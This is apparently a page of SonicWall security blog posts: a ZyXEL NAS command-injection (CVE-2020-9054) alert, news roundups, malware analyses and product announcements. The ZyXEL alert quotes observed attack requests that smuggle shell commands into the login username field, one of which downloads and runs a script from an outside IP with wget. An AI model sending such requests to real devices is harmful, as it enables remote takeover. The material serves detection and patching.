Hackers actively targeting remote code execution vulnerability on ZyXEL devices

/in /by

SonicWall Capture Labs Threat Research team observed attackers actively targeting Zyxel NAS (Network Attached Storage) and firewall products affected by a remote code execution vulnerability.

Vulnerability | CVE-2020-9054

A NAS system is a storage device connected to a network that allows storage and retrieval of data from a centralized location for authorized network users and heterogeneous clients. ZyXEL NAS devices perform authentication by using the weblogin.cgi program. This program fails to properly sanitize the username parameter that is passed to it. If the username parameter contains OS command, it can allow command injection with the privileges of the web server that runs on the ZyXEL device. By sending a specially-crafted HTTP POST or GET request to a vulnerable ZyXEL device, a remote, unauthenticated attacker may be able to execute arbitrary code with root privileges on the device.

We observe the below hits more often as attackers scan for the vulnerable devices. In the username parameter, it sends the command “ls,” a vulnerable device will return without any error.

"GET /adv,/cgi-bin/weblogin.cgi?username=admin%27%3Bls%20%23&password=asdf"

On vulnerable devices, the attacker performs the below Http GET request which attempts to download a shell script to the “tmp” directory, execute the shell script “test.sh”, and later remove the script.

"GET /adv,/cgi-bin/weblogin.cgi?username=admin;cd+%2Ftmp%3Bwget+http%3A%2F%2F62.171.171.24%2Ftest.sh%3Bsh+test.sh%3Brm+test.sh HTTP/1.1"

A quick search on shodan shows few hundreds of the affected ZyXEL NAS devices exposed online.

 

Trend Chart:

SonicWall Capture Labs Threat Research team provides protection against this exploit with the following signatures:

IPS: 15005 ZyXEL Firewall/NAS Remote Code Execution

Affected Products:

ZyXEL NAS products running firmware version 5.21 and earlier are affected by this vulnerability.

Users are recommended to install the standard firmware patches immediately. No updates available for NAS products that reached end-of-support, users are advised not to leave the product directly exposed to the internet. If possible, connect it to a security router or firewall for additional protection.

Find vendor advisory here

IOC:

Attacker IP’s:

62.171.171.24
108.41.185.191
95.55.151.170
110.29.165.15
83.228.1.77
213.59.131.51
201.21.226.33
222.138.203.0
77.76.182.174
103.123.150.66
182.180.173.249
194.143.248.230
128.90.164.48
103.234.226.145
75.145.190.44
94.227.15.86
108.7.223.135
169.1.233.212
114.129.28.252
89.211.220.169
37.191.233.81
187.143.247.123
116.196.65.202
47.101.136.228
93.114.113.103
154.126.79.223
187.182.168.14
14.234.48.139
92.70.17.98
177.81.219.19
91.227.50.230
122.230.145.99
95.76.102.94
77.52.185.59
67.165.140.191
187.120.194.22
82.222.168.10
94.225.181.234
124.123.127.69
61.239.185.168
190.139.6.182
213.164.215.33
103.240.77.52
124.109.50.214
122.117.143.35
114.220.117.147
109.130.153.176
83.23.126.120
93.40.11.165
213.153.153.219
103.133.122.6
203.40.91.116
186.158.175.131
69.254.107.46
2.26.219.16
177.41.37.241
73.185.241.75
200.117.244.223
220.184.203.94
41.188.62.215
177.39.102.151

 

 

 

 

Cybersecurity News & Trends – 06-26-20

/0 Comments/in /by

Hackers made inroads this week with zero-day threats, massive DDoS attacks and point-of-sale compromises — but there were significant wins for the good guys, too.

SonicWall Spotlight

CEO Outlook 2020 – Bill Conner — CRN

  • CRN recently asked 80 of the industry’s top CEOs — including SonicWall’s Bill Conner — why 2020 will be the launch of the data decade.

MSPs will be forced to fix ‘rushed out’ remote working solutions post-COVID – Sonicwall CEO —  Channel Partner Insight

  • In an interview with CPI, Bill Conner explained that as changes to work patterns are likely to outlast the pandemic, pivoting out of lockdown will mean some of the earlier “temporary” remote working solutions will need to be re-engineered.

The Tel Aviv Tech Startups that are Solving COVID-19 Challenges — Forbes

  • Tel Aviv-based Perimeter 81, a provider of network security-as-a-service that recently completed a $10 million Series A led by SonicWall and existing investors, offers solutions that replace traditional VPNs.

Cybersecurity News

FBI warns K-12 schools of ransomware attacks via RDP —  ZDNet

  • The FBI has issued a security alert warning K-12 schools about ransomware gangs abusing RDP connections to break into school systems.

There are DDoS attacks, then there’s this 809 million packet-per-second tsunami Akamai says it just caught —  The Register

  • The attack, which targeted an unspecified European bank, was the largest such attack Akamai had ever encountered — and CDN believes it may be the largest DDoS attack to hit any network, ever.

This ransomware has learned a new trick: Scanning for point of sales
devices —  ZDNet

  • Already one of the most dangerous forms of ransomware, Sodinokibi now looks like it could be attempting to make money from stolen payment information, too.

FBI sees major spike in coronavirus-related cyber threats — The Hill

  • FBI’s Internet Crime Complaint Center (IC3) has received 20,000 coronavirus-related cyber threat reports this year — as many as they received in all of 2019.

Republicans propose bill to end ‘warrant-proof’ encryption
The Washington Times

  • Republicans on the Senate Judiciary Committee introduced a bill Tuesday taking on the encryption technology that major tech companies use to secure customer data.

New WastedLocker ransomware demands payments of millions of USD —  ZDNet

  • Evil Corp, one of the biggest malware operations on the planet, has returned to life with a new ransomware strain.

Ransomware operators lurk on your network after their attack —  Bleeping Computer

  • While many believe attackers quickly deploy ransomware and leave so they won’t get caught, in reality threat actors are not so quick to give up a resource that they worked so hard to control.

Phishing and cryptocurrency scams squashed as one million emails are reported to new anti-scam hotline —  ZDNet

  • In the two months since its launch, the UK’s new anti-scam hotline has received an average of 16,500 emails per day, resulting in 10,000 links to online scams either blocked or taken down by authorities.

Hacker arrested for stealing, selling PII of 65K hospital employees
Bleeping Computer

  • 29-year-old Justin Sean Johnson has been arrested for allegedly stealing PII and W-2 information for over 65,000 University of Pittsburgh Medical Center employees and selling it on the dark web.

Security surprise: Four zero-days spotted in attacks on researchers’ fake networks —  ZDNet

  • Previously unknown attacks used against fake systems highlight big problems with industrial systems security.

In Case You Missed It

Cobralocker ransomware actively spreading in the wild

/in /by

The SonicWall Capture Labs threat research team observed reports of a new variant family of COBRALOCKER ransomware [COBRALOCKER.RSM] actively spreading in the wild.

The COBRALOCKER ransomware encrypts the victim’s files with a strong encryption algorithm until the victim pays a fee to get them back.

Infection Cycle:

The ransomware adds the following files to the system:

  • Malware.exe
    • %App.path%\ [Name]. <Cobra>

Once the computer is compromised, the ransomware runs the following commands:

The ransomware encrypts all the files and appends the [Cobra] extension onto each encrypted file’s filename.

During our analysis, we have noticed the malware using the following Key to encrypt your files. (See source code below).

This makes our jobs easier to create a Decryptor tool for COBRALOCKER.

After encrypting all personal documents, the ransomware shows the following picture containing a message reporting that the computer has been encrypted and to contact its developer for unlock instructions.

We have been monitoring varying hits over the past few days for the signature that blocks this threat:

SonicWall Capture Labs threat research team provides protection against this threat via the following signature:

  • GAV: COBRALOCKER.RSM (Trojan)

A Brief History of COVID-19 Related Attacks, Pt. 1

/0 Comments/in , /by

As the world manages voluntary quarantines, mandated isolations, social distancing and “shelter-at-home” edicts, cybercriminals are busy creating malware and other cyberattacks that prey on the fear surrounding the novel coronavirus epidemic (COVID-19).

“More than ever, the public needs to be hyper-aware of the interactions they have online, particularly involving the links and emails they open,” SonicWall Vice President Terry Greer-King told The Sun. “Cybercriminals do their utmost to take advantage of trying times by tricking users into opening dangerous files, through what they consider to be trusted sources.”

While SonicWall Capture Labs threat researchers are constantly investigating and analyzing all threats, the team has flagged the top cyberattacks that leverage coronavirus and COVID-19 to take advantage of human behavior. Here are some of the earliest:

Malicious Archive File: February 5, 2020

In early February, SonicWall Capture Labs used patent-pending Real-Time Deep Memory Inspection (RTDMI) to detect an archive file containing an executable file named CoronaVirus_Safety_Measures.exe. The archive is delivered to the victim’s machine as an email attachment.

After analyzing the executable file, SonicWall found that the file belongs to the GOZ InfoStealer family, which was first detected by SonicWall RTDMI in November 2019.

The GOZ InfoStealer is known for stealing user data from installed applications, along with victims’ system information, which is then sent to the threat actor over Simple Mail Transfer Protocol (SMTP).

The malware author is continuously updating the malware code and changing its infection chain. Details of this analysis are available in this SonicAlert: “Threat Actors Are Misusing Coronavirus Scare To Spread Malicious Executable.”

Coronavirus-Themed Android RAT: February 26, 2020

SonicWall Capture Labs observed a coronavirus scare tactic being used in the Android ecosystem in the form of a Remote Access Trojan (RAT), which is an Android apk that simply goes by the name coronavirus.

After installation and execution, this sample requests that the victim re-enter the pin/pattern on the device and steals it while repeatedly requesting ‘accessibility service’ capabilities.

Upon viewing the code structure (below), it becomes apparent that some form of packing/encoding is being used in this sample. The class names appear random, but have a structure in themselves; most class names are of similar length and equally random.

On inspecting the Manifest.xml files, most of the activities listed are unavailable in the decompiled code. This indicates that the ‘real’ class files will be decrypted during runtime. This is a mechanism that makes it difficult for automated tools to analyze the code and give a verdict.

Details of this analysis are available in this SonicAlert: “Coronavirus-themed Android RAT on the Prowl.”

SonicWall Capture Labs provides protection against these threats with the following signatures:

  • AndroidOS.Spyware.RT (Trojan)
  • AndroidOS.Spyware.DE (Trojan)

COVID-19 Hoax Scareware: March 13, 2020

SonicWall Capture Labs threat researchers observed a malware taking advantage of the coronavirus (COVID-19) fears, also known as ‘scareware.’ The sample pretends to be a ransomware by displaying a ransom note (shown below). In reality, however, it does not encrypt any files.

To scare the victim, a number of security warning messages are displayed:

In the end, the malware is benign and hopes fear and human behavior will force victims into paying the ransom. Details of this analysis are available in this SonicAlert: “COVID-19 Hoax Scareware.”

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Scareware.CoVid_A (Trojan)

Malicious “Marketing Campaign” Propagates Android RAT: March 14, 2020

SonicWall Capture Labs threat researchers discovered and analyzed malicious campaign websites that currently serve (at the time of publication) Android Remote Access Trojan (RAT) belonging to the same family discovered in February 2020 (see below).

Cyberattackers are creating websites that spread misinformation about coronavirus (COVID-19), falsely claiming ways to “get rid of” the novel virus. Instead, the sites attract new victims via download links.

SonicWall found two main variants of this strategy, one in English and another in Turkish. Both serve the apk named corona.apk when the victim clicks on Google Play image.

Upon downloading the apk file and examining the code, SonicWall found a similar structure to the variant outlined in February. This sample is an Android Remote Access Trojan (RAT) and can perform a number of malicious operations, including:

  • Get information about the device
  • Get a list of apps installed
  • Allow remote control of the device via TeamViewer
  • Steal Gmail password and/or lock pattern
  • Keylogger
  • Upload files
  • Steal SMS messages, contacts
  • Disable Play Protect

There is a lot of misinformation and panic surrounding coronavirus (COVID-19). SonicWall Capture Labs reiterates that there are no mobile apps that can track coronavirus infections or point to a vaccine. Please exercise extreme caution.

Details of this analysis are available in this SonicAlert: “Misinformation Related to Coronavirus Being Used to Propagate Malicious Android RAT.”

SonicWall Capture Labs provides protection against this threat with the following signatures:

  • Spyware.RT (Trojan)
  • Spyware.DE (Trojan)

12-Layer Azorult.Rk: March 16, 2020

SonicWall Capture Labs threat researchers found a new sample and activity for the “coronavirus” binary Azorult.Rk. Malware authors have taken advantage of the public’s desire for information on the COVID-19 pandemic since it was first discovered in December 2019 — and it has only escalated since.

Azorult.Rk masquerades as an application providing diagnosis support, even including a screenshot of a popular interactive tool that maps COVID-19 cases and exposure. It includes 12 different layers of static and dynamic information, making it difficult for threat analysts to quickly investigate. This specific analysis serves as a strong primer on how malware authors mask their motives and tactics.

After sorting through the layers, SonicWall found the malware eventually attempted to transmit statistics and metrics of the physical machine hardware, as well usernames, hostnames and much more.

Details of this analysis are available in this SonicAlert: “Coronavirus, COVID-19 & Azorult.Rk.”

SonicWall Capture Labs provides protection against this threat with the following signature:

  • GAV: Azorult.RK

Coronavirus Ransomware: March 19, 2020

SonicWall Capture Labs threat researchers have observed a new ransomware threat leveraging coronavirus fear. This ransomware encrypts and zips the files and renames it ‘coronaVi2022@protonmail.ch__<filename>’. It then changes the drive name to coronavirus and drops coronavirus.txt in each and every folder of the infected system.

After modifying registration keys, it adds new keys and shows users the following ransom message:

After 20 minutes, it restarts the victim machine and displays yet another ransom note.

Additional details of this analysis are available in this SonicAlert: “Coronavirus Ransomware.”

SonicWall Capture Labs provides protection against this threat with the following signatures:

  • GAV: CoronaVirus.RSM_2
  • GAV : CoronaVirus.RSM

Work-from-Home VPN Solutions for Remote Workforces

To help organizations cost-effectively implement VPN technology for their rapidly expanding work-from-home employees, SonicWall is making its remote access products and services available to both new and existing customers at deeply discounted rates. We’re also bundling critical security solutions for new enterprise and SMB customers.

This special offer provides free Secure Mobile Access (SMA) virtual appliances sized for enterprises and SMBs, and also includes 50% discounts on Cloud App Security and Capture Client endpoint protection when paired with SMA.

These packages were bundled to include everything needed to protect employees outside the network:

Fraudsters victimizing innocent users through a dubious Android finance app

/in /by

CoViD19 pandemic has created a global crisis, and threat actors have worsened the situation by unleashing their malicious handiwork.

SonicWall capture labs threats research team has been blogging regularly about the malware threats leveraging the current CoViD19 pandemic. SonicWall has found another Android app using this theme. The app until some time was distributed via Google Play Store, it has been removed from the Play Store after we reported this to the concerned team.

The app named Cashbox is categorized as a Finance app. It targets Indian Android Phone consumers and is portrayed as an app that would assist customers to get a loan. The high number of installs indicates a large number of users may have been victimized:

 

The fraudulent app seems to have passed unnoticed by security solutions, as illustrated by the fact that the app isn’t detected by AV vendors on the popular threat intelligence sharing portal VirusTotal:

 

The app promises to help provide easy loans to customers. Description of the app contains Loan EMI and interest details as shown below:

 

Post installation, it showed a list of permissions required. Interestingly, the app prompts the user to grant permissions by describing why those permissions are required:

 

The user must provide the loan amount first; eventually, it asks for PAN (Permanent Account Number) Card, and self-photo clicked using the phone camera to be uploaded:

 

Thereafter, the user is informed that authentication is completed and the user’s name, along with PAN Card number and Date of Birth are displayed to look genuine, which reduces suspicion:

 

Next, it asks the user to make a payment of Rs. 99 through any of the four options Card, UPI, Wallets, or Net Banking as shown below:

 

Then, other loan facilitating apps are recommended:

    Recommended apps

 

All the personal information is requested again if the user decides to use any of the recommended apps. The users are first promised easy loans but in return their personal information is stolen and a new loan app is recommended.

Reviews shared by some of the users of the fraudulent app reflect their frustration:

 

The below code snippet indicates the app fetched user’s location and device information as well:

 

SonicWall Capture Labs provides protection against this threat with the following signature :

Android_FraudApp.A (Trojan)

 

Indicators Of Compromise (IOC’s):

1ab6fe4483a77ccffe9876d5426822a57037d6a890382666442342b2704464bb

SonicWall’s Online Community Connects Cybersecurity Professionals

/0 Comments/in /by

SonicWall recently launched an online community to connect like-minded professionals from around the world. Since the launch, there have been nearly a thousand users who have interacted with one another, each contributing and helping through their own unique technical expertise, personal knowledge and experience.

But what is a community? Gartner defines a community as “a constantly changing group of people collaborating and sharing their ideas over an electronic network.” By bringing together a group of people with a common interest, providing a platform for addressing many readers at once, and facilitating communication in real time, Gartner says, communities are able to optimize their collective power.

We’ve seen this definition come to life with the launch of SonicWall Community—and the benefits are already becoming clear:

  • Exchanging best practices for lowering total cost of ownership through SonicWall solutions.
  • Learning how to maximize the value of SonicWall products.
  • Connecting with product management and support to ask questions, get help or submit an idea.
  • Sharing your experience and expertise with other SonicWall users.

A Truly Engaging Community

At its core, the community enables cybersecurity professionals to connect with one another in relevant and meaningful ways. The community is a place to ask questions, start new discussions, and collaborate with experts from across a variety of industries.

Customers and partners with questions have received relevant and helpful responses by both SonicWall staff and experienced professionals in the field. Members have come together to solve difficult problems. Through collective brainstorming and creativity, issues that may have taken a few days are now solved in half the time.

The community is easy to use and features a variety of ways to find meaningful content. Take advantage of the built-in search to find relevant posts, view the latest discussions, or select from a wide variety of solution categories.

And with the real-time notification option, it’s easy to know when one of your questions has received a response. You can also choose to stay up to date on product notifications, user mentions, issues found in the wild, and more

The community even has a developer hub for in-depth technical discussions, as well as a virtual “water cooler” to take a break to swap ideas and connect with peers.

The best part about joining the community is that it gives you free, 24/7 access to a wealth of knowledge — and getting started is easy. Simply navigate to community.sonicwall.com and sign in with your existing MySonicWall credentials to start participating. If you don’t have a MySonicWall account, that’s OK. It’s free to create one and takes just a few minutes to sign up.

Join SonicWall Community

Whether you’re just getting started with SonicWall products or you’ve been with us for years, the SonicWall community has something to offer. And if you choose to share your own unique knowledge and experience, you have the potential to help countless others.

Come join the conversation now at community.sonicwall.com.
 

Join Now

Cybersecurity News & Trends – 06-19-20

/0 Comments/in /by

This week, SonicWall’s new Switches and Secure SD-Branch made waves, hackers made a stronger Qbot, and attacks on AWS made history.

SonicWall Spotlight

ChannelPro 5 Minute Roundup — ChannelPro Network

  • Erick and Rich of ChannelPro explore the far-reaching implications of SonicWall’s new branch office networking solution, which they say arrived at a great time for businesses.

SonicWall Launches New Network Switches — Enterprise Times

  • SonicWall has announced a range of new products, including new multi-gigabit switches and an SD-Branch solution.

SonicWall Advances Network Edge Security, Adds Multi-gigabit Switch Series and New SD-Branch Capabilities — TMCnet

  • TMCnet highlights SonicWall’s momentum over the past quarter, including the release of new and enhanced MSSP offerings and the launch of its SD-Branch capabilities.

SonicWall takes threat protection to the branch level — MicroScope

  • This article covers the  latest SD-Branch offering as a major shift and a milestone in its corporate history, with it set to have a major impact on the security player’s channel.

Cybersecurity News

Researchers Expose a New Vulnerability in Intel’s CPUs — Wired

  • Modern CPUs — particularly those made by Intel — have been under siege in recent years by an unending series of attacks. Now, two separate academic teams disclosed two new and distinctive exploits that pierce Intel’s Software Guard eXtension, by far the most sensitive region of the company’s processors.

Google Sees Increase in COVID-19 Phishing in Brazil, India, UK — Security Week

  • Cyberthreats taking advantage of the COVID-19 pandemic are evolving, and Google is seeing an increase in related phishing attempts in some countries.

Attackers impersonate secure messaging site to steal bitcoins — Bleeping Computer

  • In what can be described as the case of both cybersquatting and phishing, threat actors have created a site that imitates the legitimate secure note sharing service privnote.com to steal bitcoins.

Coder-Turned-Kingpin Paul Le Roux Gets His Comeuppance — Wired

  • Paul Le Roux, 47 — who faced up to a life sentence after pleading guilty to crimes ranging from methamphetamine trafficking to selling weapons technology to Iran — has been sentenced to 25 years in federal prison.

Targeting U.S. banks, Qbot trojan evolves with new evasion techniques — SC Magazine 

  • By malware standards, the banking trojan Qbot is long in the tooth, but it still has some bite, according to researchers who say it has added some detection and research evasion techniques to its arsenal.

Hackers Trigger Far-Reaching Disruption by Targeting Low-Profile Firm — The Wall Street Journal

  • Small and midsize companies are fighting a rising tide of cyberattacks largely out of public view, posing an underappreciated risk for the bigger companies and institutions that use their services.

Google Alerts catches fake data breach notes pushing malware — Bleeping Computer

  • Fraudsters have begun pushing fake data breach notifications using big company names to distribute malware and scams. They’re mixing black SEO, Google Sites, and spam pages to direct users to dangerous locations.

Exclusive: Massive spying on users of Google’s Chrome shows new security weakness — Bloomberg

  • A newly discovered spyware effort attacked users through 32 million downloads of extensions to Google’s Chrome web browser, highlighting the tech industry’s failure to protect browsers despite their increasing use for email, payroll and other sensitive functions.

AWS said it mitigated a 2.3 Tbps DDoS attack, the largest ever — ZDNet

  • The previous record for the largest DDoS attack ever recorded was of 1.7 Tbps, recorded in March 2018.

In Case You Missed It

Fake ransomware decryptor spreads Zorab ransomware

/in /by

Sonicwall Capture Labs threat research team observed  Zorab ransomware posing as DJVU ransomware decryptor .

When a user’s computer files are encrypted by a ransomware,he desperately looks for tool to decrypt files instead of paying ransom. One such decyptor called DecryptorDjvuMlagham.exe instead of removing the DJVU ransomware infection, it spreads Zorab ransomware.

Infection cycle

Upon clicking the application it launches a console and asks for relevant information.

But it accepts any input and does not validate it.

Once you click Start Scan instead of scanning it extracts another executable called crab[.]exe at users\AppData\Local\Temp

Dissembling the code one can see that on the button click crab.exe is extracted.

This executable then starts encrypting files. The encrypted files have extension .ZRB
It also encrypts the already encrypted files and changes the extension to .ZRB
 

The attacker keeps a ransom note in each folder called -DECRYPT~ZORAB.txt

The ransomware note reads the following and boasts that this is just a business and they don’t care about the victim. They also demand to write an email to zorab28@protonmail.com for information about how to decrypt files.

At the time of writing this alert we had not yet received a response to the email that we sent to the attacker.

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • GAV: Zorab.RSM (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

This long spreading Android locker has been spotted using Coronavirus theme

/in /by

SonicWall Capture Labs threat research team observed a number of Android locker samples that cover the homescreen with a ransom message. We observed a number of malicious apps belonging to this locker campaign that are re-packaged to appear as popular apps such as Whatsapp, Netflix and a recent Coronavirus app named in Uzbek – Koronavirus haqida – which translates to “About Coronavirus”

We observed samples as latest as 2020-06-15  on the popular malware portal VirusTotal belonging to this campaign.

Infection Cycle

Upon execution the screen is covered by a warning message, the message varies from app to app. Only some apps from this campaign demand a ransom in exchange of the unlock keys. However the template used by these ransom messages is somewhat similar:

 

Translation of some of the messages shown on the screen by few malicious lockers belonging to this campaign are as below:

  • “Your Android is Blocked! You have visited or used sites in violation of law”
  • “Android is locked !”
  • “Your phone is coded!”

However there are few apps from this campaign that make an effort to stand out:

 

Startup trigger

Even though the locker does not encrypt files such as a regular ransomware, the phone becomes unusable as buttons do not respond and the phone screen is covered by the ransom message. At this point a victim may not have many options other than to try and reboot the device.

However that does not work because of the permission requested by the malicious locker – RECEIVE_BOOT_COMPLETED. As soon as the device boots, the background service in the malicious locker LockService gets triggered which starts the locker and displays the ransom message over the screen.

Hardcoded unlock key

This locker campaign locks the screen with a ransom message and demands ransom for an unlock code. However the unlock code is hardcoded and can be found within the same class file in the samples belonging to this campaign  – com.lololo/LockService;->onClick()

The image below shows hardcoded unlock codes for few samples:

 

Easy removal

The apps from this campaign do not request dangerous permissions such as BIND_DEVICE_ADMIN and BIND_ACCESSIBILITY_SERVICE, there are no safeguards against their uninstallation from the device. If Developer Tools are enabled on the device a victim can easily remove this locker by issuing the command below over adb:

  • adb shell pm uninstall com.lololo

 

Popular Targets

The apps from this campaign are re-packaged with different app names and icons that match popular apps. Some of the apps we observed during our analysis include:

  • WhatsApp
  • Netflix
  • Telegram
  • Grand Theft Auto 5 hacks
  • Minecraft hack
  • King root

With the recent Coronavirus pandemic and malware writers capitalizing the ‘Coronavirus’ theme to propagate their malware, apps belonging to this campaign might soon carry this theme. We already identified one sample by the name –  Koronavirus haqida – we can expect more apps from this campaign to carry this theme.

 

SonicWall Capture Labs provides protection against this threat with the following signature:

  • AndroidOS.LockScreen.HM

 

Indicators Of Compromise (IOC):

  • 476b68a650223780ec73f804e639b7ce
  • f5cbc2e11e236e5d22d5a3d9af94fdef
  • 80738faefeee89e9356645b31e1854e5
  • 9e300ed7388a597cdc528b4720859526
  • 3178ad2f9d84ba06e14184dd4426c39b
  • 19be9e9f7d26cb47054354eefe4bc86c
  • 3372427fcd1c02bfc2ab2d65cc3b6311
  • 5ece87cded91da6e2a1e7c6a4b8afe0d

 

Beat the Managed Services Blues with SonicWall and ConnectWise

/0 Comments/in /by

Are you a managed services provider (MSP or MSSP)? Are you tired of having to manually account for product and services usage by your customers, or hearing your operations team complain about manually creating and triaging tickets for security and product issues?

Have no fear: SonicWall is excited to launch the official integration of ConnectWise Manage with SonicWall’s portfolio of products. ConnectWise Manage is an out-of-the-box and easy-to-use integration that helps automate the invoicing and billing of security services for your customers. In addition, the integration automates the creation and processing of service tickets within ConnectWise Manage, including the automatic closure of tickets when alerts are closed in the product consoles.

SonicWall partners will now see a new menu option in MySonicWall for ConnectWise Integrations, under their My Workspace menu. Navigating to this page will allow them to not only set up the integration with their ConnectWise Manage instance, but also map tenants to companies.

With this integration:

  1. SonicWall hardware, software and cloud products are added to the product catalog, where partners can set their standard prices
  2. Active SonicWall software and cloud products are listed as additions to their company agreements of choice for automated product usage accounting and invoicing
  3. SonicWall hardware and virtual appliances are added as configurations, which can in turn be shared with other automation platforms like IT Glue
  4. Auto-creation of tickets is enabled based on alerts from Capture Client

This integration supports synchronization of all billable SonicWall products, including all current firewalls, Secure Mobile Access appliances, Capture Client, Cloud App Security and Global Management System, among others. While tickets are limited to alerts from Capture Client in this release, subsequent versions will bring alerts from firewall, Cloud App Security, Wireless and more.

Take a look at this video to see the integration in action!

With the recent changes to how you experience MySonicWall, the enhancements to Risk Meters, the recently launched MSSP Program, and now the launch of the ConnectWise Manage integration, if you’re a managed services provider, you can rest assured that SonicWall has your back!

Like what you see but want more? It’s in the works — we already have a ConnectWise Automate integration available as a preview. Feel free to reach out via our Communities if you need more information, and stay tuned for more integrations with other Professional Services Automation (PSA) and Remote Monitoring and Management (RMM) platforms!